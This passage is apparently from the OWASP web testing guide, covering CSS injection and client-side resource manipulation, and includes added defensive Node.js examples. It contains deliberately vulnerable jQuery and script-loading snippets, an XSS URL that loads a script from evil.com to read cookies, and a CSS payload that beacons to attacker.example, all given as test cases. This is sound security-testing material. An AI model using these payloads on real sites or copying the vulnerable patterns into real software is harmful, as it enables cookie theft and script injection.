193
Web Application Penetration Testing
as attributes “style”.
Gray Box testing
Testing for CSS Injection vulnerabilities:
Manual testing needs to be conducted and the JavaScript code analyzed in order to understand whether an attacker can inject their own content in a CSS context. In particular, we should be interested in how the website builds CSS rules from its inputs.
The following is a basic example:
<a id="a1">Click me</a>
<b id="b1">Hi</b>
<script>
// requires jQuery; everything after '#' in the URL is written straight into the style attribute
$("a").click(function(){
  $("b").attr("style", "color: " + location.hash.slice(1));
});
</script>
The above code contains a source, “location.hash”, that is controlled by the attacker and is written directly into the “style” attribute of an HTML element, so the attacker can append further CSS declarations after the intended colour value. As mentioned above, this may lead to different results depending on the browser in use and the supplied payload.
It is recommended that testers use the jQuery function css(property, value) in such circumstances, as follows, since it sets the value of a single CSS property and therefore confines the attacker to that one value rather than a whole declaration block. In general, we recommend always using a whitelist of allowed characters any time the input is reflected in a CSS context.
<a id="a1">Click me</a>
<b id="b1">Hi</b>
<script>
// requires jQuery; only the value of the "color" property can be influenced
$("a").click(function(){
  $("b").css("color", location.hash.slice(1));
});
</script>
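The difference between the two snippets above, shown as an added example that is not part of the OWASP guide: the vulnerable pattern hands the browser's CSS parser a whole declaration block, so a payload that starts with a valid colour can smuggle a second declaration (here a background image pointing at a constructed attacker host, attacker.example) that makes the victim's browser issue a request; the hardened path first checks the input against a whitelist of colour forms and only then sets a single property. The regular expression, the simplified declaration parser and the function names are assumptions made for this example and run offline in Node.

```javascript
// Added example (not part of the OWASP guide): what the browser's CSS parser
// sees when attacker-controlled input is concatenated into a style attribute,
// versus confining the input to a single, whitelisted colour value.
// The payload and the attacker host (attacker.example) are constructed.

// Whitelist for a colour value: named colour, #rgb / #rrggbb, or rgb(r, g, b).
const ALLOWED_COLOR = /^(?:[a-z]{1,20}|#[0-9a-f]{3}(?:[0-9a-f]{3})?|rgb\(\s*\d{1,3}\s*,\s*\d{1,3}\s*,\s*\d{1,3}\s*\))$/i;

function isAllowedColor(value) {
  return ALLOWED_COLOR.test(value);
}

// Vulnerable pattern from the page: $("b").attr("style", "color: " + input).
// The whole string is handed to the CSS parser as a declaration block.
function buildStyleAttribute(input) {
  return "color: " + input;
}

function pushDecl(decls, text) {
  const idx = text.indexOf(":");
  if (idx < 0) return;                       // malformed fragment, dropped by the parser
  const prop = text.slice(0, idx).trim();
  const value = text.slice(idx + 1).trim();
  if (prop && value) decls.push([prop, value]);
}

// Split a declaration block into [property, value] pairs the way a CSS parser
// would (simplified: ';' separates declarations unless it sits inside quotes
// or parentheses, so url(...) and string values survive intact).
function parseDeclarations(block) {
  const decls = [];
  let depth = 0, quote = null, cur = "";
  for (const ch of block) {
    if (quote) { cur += ch; if (ch === quote) quote = null; continue; }
    if (ch === '"' || ch === "'") { quote = ch; cur += ch; continue; }
    if (ch === "(") depth++;
    if (ch === ")") depth = Math.max(0, depth - 1);
    if (ch === ";" && depth === 0) { pushDecl(decls, cur); cur = ""; continue; }
    cur += ch;
  }
  pushDecl(decls, cur);
  return decls;
}

// Hardened pattern: validate against the whitelist first, then set only the
// colour property (what $("b").css("color", input) does behind a whitelist).
function safeColorStyle(input) {
  return isAllowedColor(input) ? "color: " + input : null;
}

// Constructed payload: a valid colour followed by a second declaration that
// makes the victim's browser fetch an attacker URL (a beacon the attacker logs).
const payload = "red; background: url(https://attacker.example/beacon?hit=1)";

console.log(parseDeclarations(buildStyleAttribute(payload)));
// [ [ 'color', 'red' ], [ 'background', 'url(https://attacker.example/beacon?hit=1)' ] ]
console.log(safeColorStyle(payload));   // null: rejected by the whitelist
console.log(safeColorStyle("#ff0000")); // color: #ff0000
```

Run it with node and try further payloads against `parseDeclarations`: anything the parser turns into more than one declaration, or into a value containing `url(` or `expression(`, is a finding for the attr("style", ...) code path, while `safeColorStyle` returns null for all of them.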
References
OWASP Resources
• DOM based XSS Prevention Cheat Sheet
• DOMXSS Wiki - https://code.google.com/p/domxsswiki/wiki/CssText
Presentations
• DOM Xss Identification and Exploitation, Stefano Di Paola - http://dominator.googlecode.com/files/DOMXss_Identification_and_exploitation.pdf
• Got Your Nose! How To Steal Your Precious Data Without Using Scripts, Mario Heiderich - http://www.youtube.com/watch?v=FIQvAaZj_HA
• Bypassing Content-Security-Policy, Alex Kouzemtchenko - http://ruxcon.org.au/assets/slides/CSP-kuza55.pptx
Proof of Concepts
• Password “cracker” via CSS and HTML5 - http://html5sec.org/invalid/?length=25
• CSS attribute reading - http://eaea.sirdarckcat.net/cssar/v2/
Testing for Client Side Resource Manipulation (OTG-CLIENT-006)
Summary
A Client Side Resource Manipulation vulnerability is an input validation flaw that occurs when an application accepts user controlled input which specifies the path of a resource (for example the source of an iframe, js, applet or the handler of an XMLHttpRequest). Specifically, such a vulnerability consists in the ability to control the URLs which link to resources present in a web page. The impact varies with the type of element whose URL is controlled by the attacker, and the flaw is usually exploited to conduct Cross-Site Scripting attacks.
How to Test
Such a vulnerability occurs when the application employs user controlled URLs for referencing external or internal resources. In these circumstances it is possible to interfere with the expected application behavior by making it load and render malicious objects.
The following JavaScript code shows a possible vulnerable script in which the attacker is able to control “location.hash” (the source), which reaches the “src” attribute of a script element. This obviously leads to XSS, since an external JavaScript file can easily be injected into the trusted web site.
<script>
// runs at the end of <body>; the URL fragment is fully attacker controlled
var d = document.createElement("script");
if (location.hash.slice(1))
  d.src = location.hash.slice(1);
document.body.appendChild(d);
</script>
Specifically, the attacker could target the victim by asking her to visit the following URL:
www.victim.com/#http://evil.com/js.js
Where js.js contains:
alert(document.cookie)
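How the fragment above turns into a script source, and the check a hardened page would apply before assigning “src”, as an added example that is not part of the OWASP guide. It resolves the fragment relative to the page with the WHATWG URL API (available in Node and browsers), requires https and an exact match against an origin allowlist, and so rejects the http://evil.com-style payload from the text as well as protocol-relative (`//host/...`), `javascript:` and look-alike-host variants. The page URL, the hosts (victim.example, evil.example), the allowlist and the function names are assumptions made for this example; the same check applies to iframe, XMLHttpRequest or fetch targets built from user input.

```javascript
// Added example (not from the OWASP guide): resolving an attacker-controlled
// URL fragment into a script URL the way the vulnerable snippet does, next to
// the origin allowlist check a hardened page would apply first. Page URL,
// hosts and allowlist are constructed for illustration.

const PAGE_URL = "https://www.victim.example/page";

// Only scripts served from these exact origins may be loaded dynamically.
const ALLOWED_SCRIPT_ORIGINS = new Set([
  "https://www.victim.example",
  "https://static.victim.example",
]);

// What the vulnerable page does: everything after '#' becomes the script src.
// The fragment is never sent to the server, so server-side logs or filters
// cannot see this payload; only the client can refuse it.
function vulnerableScriptSrc(pageUrl) {
  const hash = new URL(pageUrl).hash.slice(1);
  return hash ? hash : null;
}

// Hardened resolution: parse the fragment relative to the page, require https
// and an allowlisted origin, and return the normalised absolute URL or null.
function safeScriptSrc(pageUrl, allowedOrigins = ALLOWED_SCRIPT_ORIGINS) {
  const hash = new URL(pageUrl).hash.slice(1);
  if (!hash) return null;
  let target;
  try {
    target = new URL(hash, pageUrl);          // also resolves relative paths like /assets/app.js
  } catch (e) {
    return null;                              // unparsable input: refuse to load anything
  }
  if (target.protocol !== "https:") return null;       // blocks http:, javascript:, data:
  if (!allowedOrigins.has(target.origin)) return null; // exact origin match, not a substring test
  return target.href;
}

// Constructed attack and benign URLs a tester would try against the page.
const SAMPLE_URLS = [
  PAGE_URL + "#http://evil.example/js.js",                        // the payload from the text
  PAGE_URL + "#//evil.example/js.js",                             // protocol-relative
  PAGE_URL + "#javascript:alert(document.cookie)",                // pseudo-scheme
  PAGE_URL + "#https://static.victim.example.evil.example/a.js",  // look-alike host
  PAGE_URL + "#/assets/app.js",                                   // legitimate relative path
];

for (const url of SAMPLE_URLS) {
  console.log(url, "\n  vulnerable ->", vulnerableScriptSrc(url), "\n  hardened   ->", safeScriptSrc(url));
}
```

Note that `safeScriptSrc` compares `origin`, which includes scheme, host and port, rather than checking whether the host string contains a trusted name; the look-alike host entry in `SAMPLE_URLS` is exactly the case a substring check would wave through.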
Controlling a script's source is a basic example; other, more subtle cases can arise. A widespread scenario involves the possibility of controlling the URL called in a CORS request: since the server that receives the request decides, through the CORS response headers, whether the requesting origin may read the response, an attacker who controls that URL can point it at their own web site, answer with permissive CORS headers and have the target page load malicious content from there.
Refer to the following vulnerable code: